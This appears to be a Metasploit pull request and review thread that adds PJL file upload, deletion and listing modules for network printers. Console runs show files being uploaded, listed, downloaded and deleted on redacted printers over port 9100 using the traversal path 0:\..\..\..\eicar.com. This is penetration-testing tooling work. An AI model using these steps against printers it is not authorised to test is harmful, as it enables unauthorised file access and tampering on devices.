### PR TITLE
Add file query/upload/deletion support to Rex::Proto::PJL

### PR DESCRIPTION
**Pull request by wvu**
**Feature description:**

This PR adds support for querying/uploading/deleting files on printers via the `Rex::Proto::PJL` interface. It also adds the `printer_upload_file` and `printer_delete_file` modules to facilitate this.

It's been a long time coming. Should have added it when I added file download support. :)

**Verification steps:**
- [x] Find a printer with PJL access (9100/TCP)
- [x] Upload cat pictures to it
- [x] Delete cat pictures
- [x] Upload hax

**Sample run:**

```
msf > setg rhosts [redacted]
rhosts => [redacted]
msf > use auxiliary/scanner/printer/printer_upload_file 
msf auxiliary(printer_upload_file) > run

[+] [redacted]:9100 - Saved /home/wvu/metasploit-framework/data/eicar.com to 0:\..\..\..\eicar.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_upload_file) > use auxiliary/scanner/printer/printer_delete_file 
msf auxiliary(printer_delete_file) > run

[+] [redacted]:9100 - Deleted 0:\..\..\..\eicar.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_delete_file) > 
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Good to go now, @bcook-r7. Fixed some nagging issues.

**Comment by wvu-r7** [comment]
FYI, not all printers will support the entire spec, much less implement it correctly. YMMV with whatever printers you encounter.

**Comment by bcook-r7** [comment]
testing now...

**Comment by bcook-r7** [comment]
In spite of all the fun we had messing with printers, this looks OK to me.

```
msf auxiliary(printer_upload_file) > set LPATH HACKING
LPATH => HACKING
msf auxiliary(printer_upload_file) > run

[+] redacted:9100 - Saved HACKING to 0:\..\..\..\eicar.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
use auxiliary/scanner/printer/printer_list_dir      use auxiliary/scanner/printer/printer_list_volumes
msf auxiliary(printer_upload_file) > use auxiliary/scanner/printer/printer_list_dir
msf auxiliary(printer_list_dir) > run

[+] redacted:9100 - .. TYPE=DIR
.no_fsck TYPE=FILE SIZE=0
. TYPE=DIR
lost+found TYPE=DIR
eicar.com TYPE=FILE SIZE=1143
ow TYPE=DIR
emp TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_list_dir) > use auxiliary/scanner/printer/printer_d
use auxiliary/scanner/printer/printer_delete_file    use auxiliary/scanner/printer/printer_download_file
msf auxiliary(printer_download_file) > set PATH '0:\..\..\..\eicar.com'
PATH => 0:\..\..\..\eicar.com
msf auxiliary(printer_download_file) > run

[+] redacted:9100 - Saved 0:\..\..\..\eicar.com as /Users/bcook/.msf4/loot/redacted.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_download_file) > use auxiliary/scanner/printer/printer_delete_file
msf auxiliary(printer_delete_file) > run

[+] redacted:9100 - Deleted 0:\..\..\..\eicar.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(printer_delete_file) > use auxiliary/scanner/printer/printer_list_
use auxiliary/scanner/printer/printer_list_dir      use auxiliary/scanner/printer/printer_list_volumes
msf auxiliary(printer_delete_file) > use auxiliary/scanner/printer/printer_list_dir
msf auxiliary(printer_list_dir) > run

[+] redacted:9100 - .. TYPE=DIR
.no_fsck TYPE=FILE SIZE=0
. TYPE=DIR
lost+found TYPE=DIR
ow TYPE=DIR
emp TYPE=DIR

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

**Pull request merged**
